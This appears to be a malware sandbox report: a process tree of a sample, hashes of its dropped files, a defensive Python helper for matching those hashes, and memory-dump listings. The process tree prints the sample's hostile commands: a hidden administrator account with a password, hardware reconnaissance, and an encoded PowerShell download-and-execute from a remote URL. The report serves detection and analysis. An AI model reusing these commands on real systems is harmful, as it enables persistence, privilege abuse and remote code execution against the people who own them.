    command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

    C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe
  command line: cmd /C net.exe user WgaUtilAcc aKxqZVVk

  C:\Windows\system32\net.exe
    command line: net.exe user WgaUtilAcc aKxqZVVk

    C:\Windows\system32\net1.exe
      command line: C:\Windows\system32\net1 user WgaUtilAcc aKxqZVVk

C:\Windows\System32\cmd.exe
  command line: cmd.exe /C wmic path win32_VideoController get name

  C:\Windows\System32\Wbem\WMIC.exe
    command line: wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe
  command line: cmd.exe /C wmic CPU get NAME

  C:\Windows\System32\Wbem\WMIC.exe
    command line: wmic CPU get NAME

C:\Windows\System32\cmd.exe
  command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

  C:\Windows\system32\cmd.exe
    command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Blocklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2o05jx1i\2o05jx1i.dll
MD5: 4c5e4230c4a0d5cb3e9f8fe4002f0e8e
SHA1: e9ee5dbf8268d0430eaa2e33eea1a48f53042dcb
SHA256: 012d841dfa8e9c06f0ff2ec8b4a6d29ccfed4eef87d333abf4657689053cbbd1
SHA512: b67016b75745e164b06b56cb399c0eea8133a1b689dd0a21f5b4a762a9ac5d84848d5404086c84d32edac60a7bd7ddf0b7bf4eaec06787463bc3cd50908f5884
-
C:\Users\Admin\AppData\Local\Temp\ADA1.exe
MD5: f80418f12c03a56ac2e8d8b189c13750
SHA1: cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256: cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512: e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\EFAC.exe
MD5 5dec7029dda901f99d02a1cb08d6b3ab
SHA1 8561c81e8fab7889eb13ab29450bed82878e78c9
SHA256 6a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA512 09e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
-
C:\Users\Admin\AppData\Local\Temp\RES18EE.tmp
MD5 adf598fd9dc106e1234d8dabb5f59a1f
SHA1 60b1954f10e8aac1e34ebaa04be8ede74a1024f3
SHA256 6ae01786799e6ef69b8b349aa6ac578db6c063295ce2313a6329d435ff3ec982
SHA512 6185f2283b7bcfeb5d2a40a50999d65b47c43e9b9ee8c2b38c0d1b4abc9cbc1b10ceddc199cd574daa31c4098a1638e0f9ffeea63faf26879a8f4a0dcf969ea2
-
C:\Users\Admin\AppData\Local\Temp\RES212B.tmp
MD5 e6fd4f17262a85f6688d93d5e45845c7
SHA1 38a98713afbf98bd544beca39deccb51ddc3118b
SHA256 98b9764b3250592159b32c7566d1d8c6053f23d6b60dd007cc89590b2c49d224
SHA512 7035d9a9bab3bf50152284989384b8f573177529e61ab53e8c2b126377af4116e4faec561f6276e3c083015ee23ac6baea7bcc12c83f0ce9bc6350293f708183
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
MD5 854b2dfc0a28f2959b1d2fc363a4e318
SHA1 ce1753052c5bdad56708ec75d8085b2c597df6c1
SHA256 7135370ad5c4279486173fa5d0de73ea06dd814e4f8df98f80624f6f8b8c231c
SHA512 b0204091d6f89877c808c2c1db97c3723f063eace68d54b25da674b5971d0a2f7d60549923097c36dedc8c1cb2f77dfdd1dfb4df60f16682652a6755e287bfd6
-
C:\Users\Admin\AppData\Local\Temp\ni0oup1h\ni0oup1h.dll
MD5 d536b223e7d5e7d527b6e553aa801672
SHA1 bbd435d38922a185b4fe0d6b3cf8d1cb6a51cd40
SHA256 a1fc521014b0442ed99370458883fffb9efddb28fe560e579f55f07a13b2da0a
SHA512 bafb086d8e6a5a01fda11a70b2679a4f2734ef932dade38f8633f2288af77110469c4f4b4e93a013120650ba11abe179cf8a9ca8f0252597752cd7f4266721a8
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\??\c:\Users\Admin\AppData\Local\Temp\2o05jx1i\2o05jx1i.0.cs
MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\2o05jx1i\2o05jx1i.cmdline
MD5 5f401029ea2bd59afea81eba9fe4d62f
SHA1 d129a00acc143b0436459c2f6ac95d223b3b1692
SHA256 99c23d9b672e1598f9f9663c9933d5d0190da4533c55296bd16d6d5d631776d4
SHA512 e98e71c91cbb648c4c65e6edc48087b8d3d2d7ab6072cbbca595d85206ae22b595da1caa26e96d108887bbb7df0f971dd96e501cd143eef02917cd01df06c4fb
-
\??\c:\Users\Admin\AppData\Local\Temp\2o05jx1i\CSC4A6977B1B5D4D7CBDA0A64D0F7DFBD.TMP
MD5 15c35bf0a41648ac030f0ba6e44a1b61
SHA1 c048075297135ced7cc3e06b8c6f80e3c893624d
SHA256 494e57ebe07986dc1a1dd29fe2d2d5fefe4fedbc25acd3191288be4392492e99
SHA512 f127f03fdae78dcc6288096a19f861cb6803b036ae2c05a2431058fee40a8075bc7166a3a67126c53fe3bfdd04ab5a3024838a0ac6f30853db3a2d8ca677a744
-
\??\c:\Users\Admin\AppData\Local\Temp\ni0oup1h\CSC1261582FA4C645DB821DCB8B67D11D2F.TMP
MD5 deaa0064a8d754d206e99905e64de6f7
SHA1 4d202554201864accddf98a9b95b80edce86cc48
SHA256 b10c00b2f7e64cbb9eee6ead33d040eb5d303505b54d4af66c3ff7b8a1388108
SHA512 33112cb0bcd491df356222623fea6409c8b5ba8c626aadc02d8e6ecc82ae39b2a053706a72f9200403b84a94acaad4d0b7b414307fba4263fb7365c7a86995c6
-
\??\c:\Users\Admin\AppData\Local\Temp\ni0oup1h\ni0oup1h.0.cs
MD5 e0f116150ceec4ea8bb954d973e3b649
SHA1 86a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256 511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA512 32f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
-
\??\c:\Users\Admin\AppData\Local\Temp\ni0oup1h\ni0oup1h.cmdline
MD5 370ca1162ffbbf30237d92dcdc8d4d02
SHA1 a1c979e03862d514def8adfd02908a08d558b7c3
SHA256 ed6ce86ced647a3a77281620432c3765378ab8588578acbf3863545e43371d06
SHA512 9eeeff7ae1bcc0055f6f9148d3c157f4bd4c02b5bd31a18c870145ec28f8156aa5044af4768baab016025fe895c64681a4a1583c4a0e79da01a50d397725f54c
-
\Windows\Branding\mediasrv.png
MD5 83bd2c45f1faf20a77579cbb8765c2b3
SHA1 fe01b295c1005f4cbc0cfcb277dac5e7c443622c
SHA256 ca7ce804ab35bf65eb6f6e1501afbd506520bbe9bd04710d5efe0e57377a9809
SHA512 e0ac8e2d79841e18fedfed993d6e0bedb169a2ca57092292ac831667dedddbca8b90619f977d449d9595adbb9efd48487940fced5eaa38ef17366ec7075da57c
-
\Windows\Branding\mediasvc.png
MD5 af4e893deae35128088534aea49a1b74
SHA1 ce25e8e738978a2106e3464a7a4bf0345e60fd31
SHA256 76dd1fb220473c4167a73d7202943fda2109da475e515f4056a03bb01318f22d
SHA512 3115d385ec08548337b28b6b4f773578e9548d418b30f1f276f6a835a203ef497f0d23a7282f2fc7aceda73099eb4c4535c17c4842b542bd1867320f07319b97
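Digest listings like the one above are most useful when they can be applied mechanically to a suspect host: parse the records, drop repeated entries, check each digest is well formed, and compare a file against all four digests rather than one. The helper below is an added example, not the sandbox's own code. REPORT_EXCERPT is a constructed excerpt in the flattened shape such listings are often extracted in (digest label fused to its value, one entry repeated); its digests are the ADA1.exe and EFAC.exe values from this report. The function names are this example's own, and a file whose digests only partly agree with a record is reported as inconsistent rather than as a match, since that usually means a mis-copied record.

```python
"""Parse a flattened sandbox 'Downloads' listing and match files against it.

Added example; not the sandbox's own code. REPORT_EXCERPT is a constructed
excerpt in the flattened shape such listings are often extracted in (digest
label fused to its value, an entry repeated); its digests are the ADA1.exe and
EFAC.exe values from this report. Function names are this example's own.
"""
import hashlib
import re
from typing import Dict, List

REPORT_EXCERPT = r"""
-
C:\Users\Admin\AppData\Local\Temp\ADA1.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\ADA1.exeMD5
f80418f12c03a56ac2e8d8b189c13750
SHA1cd0b728375e4e178b50bca8ad65ce79aede30d37
SHA256cbc5d7db8e27b2369a1d83c2d8615c1dbb6263e8b80c4b12a86493c9df093716
SHA512e3fb85cc08a94193528ecc760b58904df47aa302419267c5b3386468e1d7fdece63fee05d8d95a083637b70a24035d3123c94463111ba372b39fcc69787aa196
-
C:\Users\Admin\AppData\Local\Temp\EFAC.exeMD5
5dec7029dda901f99d02a1cb08d6b3ab
SHA18561c81e8fab7889eb13ab29450bed82878e78c9
SHA2566a61b992773f571c45f2d1087a56817dd5c1f3a90ca2965cc5c7319b33f3890b
SHA51209e5856113a7b073568e878d1de74c834e318dd05b95afe8729a3008b4cc1efc0b1a6a9c21b25c0b1dadec3d6de5b5bc4ef84523f454591717b6f24fe5dffaca
"""

DIGEST_LEN = {"md5": 32, "sha1": 40, "sha256": 64, "sha512": 128}
# The character right after "SHA" (1, 2 or 5) separates the label from the digest.
SHA_LINE = re.compile(r"^SHA(1|256|512)([0-9a-fA-F]+)$")


def parse_downloads(text: str) -> List[Dict[str, str]]:
    """Rebuild one record per entry: a path line ending in 'MD5', the MD5 value
    on the next line, then SHA1/SHA256/SHA512 lines with the label fused on."""
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in (raw.strip() for raw in text.splitlines()):
        if not line or line == "-":
            continue
        if line.endswith("MD5"):
            current = {"path": line[:-3]}
            records.append(current)
            continue
        if not current:
            continue
        m = SHA_LINE.match(line)
        if m:
            current["sha" + m.group(1)] = m.group(2).lower()
        elif "md5" not in current:
            current["md5"] = line.lower()
    return records


def validate(record: Dict[str, str]) -> List[str]:
    """List missing or malformed digests; an empty list means the record is usable."""
    problems = []
    for name, length in DIGEST_LEN.items():
        value = record.get(name)
        if value is None:
            problems.append(f"missing {name}")
        elif len(value) != length or not re.fullmatch(r"[0-9a-f]+", value):
            problems.append(f"malformed {name}")
    return problems


def dedupe(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Collapse repeated (path, sha256) entries, keeping first occurrence order."""
    seen, unique = set(), []
    for record in records:
        key = (record["path"], record.get("sha256"))
        if key not in seen:
            seen.add(key)
            unique.append(record)
    return unique


def digests_of(data: bytes) -> Dict[str, str]:
    """Compute the same four digests the listing carries."""
    return {name: hashlib.new(name, data).hexdigest() for name in DIGEST_LEN}


def match_bytes(data: bytes, records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """A record matches only when all four digests agree; partial agreement is
    flagged as 'inconsistent' so a mis-copied digest is noticed, not trusted."""
    actual = digests_of(data)
    hits = []
    for record in records:
        agree = [name for name in DIGEST_LEN if record.get(name) == actual[name]]
        if len(agree) == len(DIGEST_LEN):
            hits.append({"path": record["path"], "status": "match"})
        elif agree:
            hits.append({"path": record["path"], "status": "inconsistent:" + ",".join(agree)})
    return hits


if __name__ == "__main__":
    iocs = dedupe(parse_downloads(REPORT_EXCERPT))
    for ioc in iocs:
        print(ioc["path"], ioc["sha256"], validate(ioc) or "ok")
    # Constructed bytes, not the real dropped file, so no record matches.
    print(match_bytes(b"constructed, not the real sample", iocs))
```

To use it against a host, read each candidate file's bytes and pass them to match_bytes with the deduplicated records; a "match" is a confirmed artefact of this run, while an "inconsistent" hit means the record itself should be rechecked before it is pushed to a blocklist.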
-
memory/404-306-0x000001D929EE8000-0x000001D929EEA000-memory.dmp
Filesize 8KB
-
memory/404-304-0x000001D929EE6000-0x000001D929EE8000-memory.dmp
Filesize 8KB
-
memory/404-262-0x000001D929EE0000-0x000001D929EE2000-memory.dmp
Filesize 8KB
-
memory/404-249-0x0000000000000000-mapping.dmp
-
memory/404-263-0x000001D929EE3000-0x000001D929EE5000-memory.dmp
Filesize 8KB
-
memory/648-413-0x0000000000000000-mapping.dmp
-
memory/680-401-0x0000000000000000-mapping.dmp
-
memory/732-412-0x0000000000000000-mapping.dmp
-
memory/732-182-0x0000000000000000-mapping.dmp
-
memory/856-414-0x0000000000000000-mapping.dmp
-
memory/956-146-0x0000025DD3835000-0x0000025DD3836000-memory.dmp
Filesize 4KB
-
memory/956-147-0x0000025DD3836000-0x0000025DD3837000-memory.dmp
Filesize 4KB
-
memory/956-144-0x0000025DD3830000-0x0000025DD3832000-memory.dmp
Filesize 8KB
-
memory/956-145-0x0000025DD3833000-0x0000025DD3835000-memory.dmp
Filesize 8KB
-
memory/956-142-0x0000025DD3B20000-0x0000025DD3DEF000-memory.dmp
Filesize 2.8MB
-
memory/956-139-0x0000000000000000-mapping.dmp
-
memory/1216-415-0x0000000000000000-mapping.dmp
-
memory/1352-423-0x0000000000000000-mapping.dmp
-
memory/1360-356-0x0000000000000000-mapping.dmp
-
memory/1456-188-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1456-157-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1456-159-0x000001F62D5A0000-0x000001F62D5A1000-memory.dmp
Filesize 4KB
-
memory/1456-168-0x000001F613133000-0x000001F613135000-memory.dmp
Filesize 8KB
-
memory/1456-167-0x000001F613130000-0x000001F613132000-memory.dmp
Filesize 8KB
-
memory/1456-169-0x000001F613136000-0x000001F613138000-memory.dmp
Filesize 8KB
-
memory/1456-186-0x000001F62D560000-0x000001F62D561000-memory.dmp
Filesize 4KB
-
memory/1456-160-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1456-192-0x000001F613138000-0x000001F613139000-memory.dmp
Filesize 4KB
-
memory/1456-148-0x0000000000000000-mapping.dmp
-
memory/1456-196-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1456-195-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1456-158-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1456-187-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1456-194-0x000001F62DE30000-0x000001F62DE31000-memory.dmp
Filesize 4KB
-
memory/1456-156-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1456-155-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1456-154-0x000001F62D3F0000-0x000001F62D3F1000-memory.dmp
Filesize 4KB
-
memory/1456-177-0x000001F62D520000-0x000001F62D521000-memory.dmp
Filesize 4KB
-
memory/1456-153-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1456-193-0x000001F62DAA0000-0x000001F62DAA1000-memory.dmp
Filesize 4KB
-
memory/1456-152-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1456-151-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1456-150-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1456-149-0x000001F612CA0000-0x000001F612CA2000-memory.dmp
Filesize 8KB
-
memory/1584-406-0x0000000000000000-mapping.dmp
-
memory/1664-418-0x0000000000000000-mapping.dmp
-
memory/2164-357-0x0000000000000000-mapping.dmp
-
memory/2280-128-0x0000000002E20000-0x0000000002E65000-memory.dmp
Filesize 276KB
-
memory/2280-125-0x0000000074890000-0x0000000074981000-memory.dmp
Filesize 964KB
-
memory/2280-137-0x0000000005930000-0x0000000005931000-memory.dmp
Filesize 4KB
-
memory/2280-119-0x0000000000000000-mapping.dmp
-
memory/2280-134-0x0000000005920000-0x0000000005921000-memory.dmp
Filesize 4KB
-
memory/2280-138-0x00000000709F0000-0x0000000070A3B000-memory.dmp
Filesize 300KB
-
memory/2280-122-0x0000000000AA0000-0x0000000000B0C000-memory.dmp
Filesize 432KB
-
memory/2280-123-0x0000000001170000-0x0000000001171000-memory.dmp
Filesize 4KB
-
memory/2280-124-0x00000000769E0000-0x0000000076BA2000-memory.dmp
Filesize 1.8MB
-
memory/2280-135-0x0000000076FF0000-0x0000000077574000-memory.dmp
Filesize 5.5MB
-
memory/2280-126-0x0000000000AA0000-0x0000000000AA1000-memory.dmp
Filesize 4KB
-
memory/2280-133-0x00000000058B0000-0x00000000058B1000-memory.dmp
Filesize 4KB
-
memory/2280-129-0x00000000728A0000-0x0000000072920000-memory.dmp
Filesize 512KB
-
memory/2280-132-0x0000000005A40000-0x0000000005A41000-memory.dmp
Filesize 4KB
-
memory/2280-136-0x0000000075120000-0x0000000076468000-memory.dmp
Filesize 19.3MB
-
memory/2280-130-0x0000000005F40000-0x0000000005F41000-memory.dmp
Filesize 4KB
-
memory/2280-131-0x0000000005850000-0x0000000005851000-memory.dmp
Filesize 4KB
-
memory/2292-394-0x0000000000000000-mapping.dmp
-
memory/2296-420-0x0000000000000000-mapping.dmp
-
memory/2432-403-0x0000000000000000-mapping.dmp
-
memory/2652-117-0x0000000000400000-0x0000000000828000-memory.dmp
Filesize 4.2MB
-
memory/2652-115-0x0000000000030000-0x0000000000038000-memory.dmp
Filesize 32KB
-
memory/2652-116-0x00000000001C0000-0x00000000001C9000-memory.dmp
Filesize 36KB
-
memory/2652-410-0x0000000000000000-mapping.dmp
-
memory/2668-422-0x0000000000000000-mapping.dmp
-
memory/2692-173-0x0000000000000000-mapping.dmp
-
memory/2776-292-0x0000000000000000-mapping.dmp
-
memory/2776-307-0x00000222FF150000-0x00000222FF152000-memory.dmp
Filesize 8KB
-
memory/2776-308-0x00000222FF153000-0x00000222FF155000-memory.dmp
Filesize 8KB
-
memory/2776-338-0x00000222FF156000-0x00000222FF158000-memory.dmp
Filesize 8KB
-
memory/2776-339-0x00000222FF158000-0x00000222FF15A000-memory.dmp
Filesize 8KB
-
memory/2828-416-0x0000000000000000-mapping.dmp
-
memory/2836-436-0x0000022467A00000-0x0000022467A02000-memory.dmp
Filesize 8KB
-
memory/2836-424-0x0000000000000000-mapping.dmp
-
memory/2836-437-0x0000022467A03000-0x0000022467A05000-memory.dmp
Filesize 8KB
-
memory/2836-444-0x0000022467A06000-0x0000022467A08000-memory.dmp
Filesize 8KB
-
memory/2836-470-0x0000022467A08000-0x0000022467A09000-memory.dmp
Filesize 4KB
-
memory/2840-409-0x0000000000000000-mapping.dmp
-
memory/2948-402-0x0000000000000000-mapping.dmp
-
memory/3004-411-0x0000000000000000-mapping.dmp
-
memory/3036-118-0x0000000001120000-0x0000000001136000-memory.dmp
Filesize 88KB
-
memory/3056-405-0x0000000000000000-mapping.dmp
-
memory/3136-512-0x0000000000000000-mapping.dmp
-
memory/3188-211-0x00000212A5DE0000-0x00000212A5DE2000-memory.dmp
Filesize 8KB
-
memory/3188-202-0x0000000000000000-mapping.dmp
-
memory/3188-206-0x00000212A5DE0000-0x00000212A5DE2000-memory.dmp
Filesize 8KB
-
memory/3188-205-0x00000212A5DE0000-0x00000212A5DE2000-memory.dmp
Filesize 8KB
-
memory/3188-207-0x00000212A5DE0000-0x00000212A5DE2000-memory.dmp
Filesize 8KB
-
memory/3188-260-0x00000212A5EE8000-0x00000212A5EEA000-memory.dmp
Filesize 8KB
-
memory/3188-236-0x00000212A5EE6000-0x00000212A5EE8000-memory.dmp
Filesize 8KB
-
memory/3188-204-0x00000212A5DE0000-0x00000212A5DE2000-memory.dmp
Filesize 8KB
-
memory/3188-203-0x00000212A5DE0000-0x00000212A5DE2000-memory.dmp
Filesize 8KB
-
memory/3188-212-0x00000212A5DE0000-0x00000212A5DE2000-memory.dmp
Filesize 8KB
-
memory/3188-214-0x00000212A5EE0000-0x00000212A5EE2000-memory.dmp
Filesize 8KB
-
memory/3188-209-0x00000212A5DE0000-0x00000212A5DE2000-memory.dmp
Filesize 8KB
-
memory/3188-216-0x00000212A5DE0000-0x00000212A5DE2000-memory.dmp
Filesize 8KB
-
memory/3188-210-0x00000212A5DE0000-0x00000212A5DE2000-memory.dmp
Filesize 8KB
-
memory/3188-215-0x00000212A5EE3000-0x00000212A5EE5000-memory.dmp
Filesize 8KB
-
memory/3228-395-0x0000000000000000-mapping.dmp
-
memory/3300-404-0x0000000000000000-mapping.dmp
-
memory/3352-399-0x0000000000000000-mapping.dmp
-
memory/3404-170-0x0000000000000000-mapping.dmp
-
memory/3456-179-0x0000000000000000-mapping.dmp
-
memory/3604-421-0x0000000000000000-mapping.dmp
-
memory/3644-513-0x0000000000000000-mapping.dmp
-
memory/3664-355-0x0000000000000000-mapping.dmp
-
memory/3832-417-0x0000000000000000-mapping.dmp
-
memory/3892-419-0x0000000000000000-mapping.dmp
-
memory/3960-400-0x0000000000000000-mapping.dmp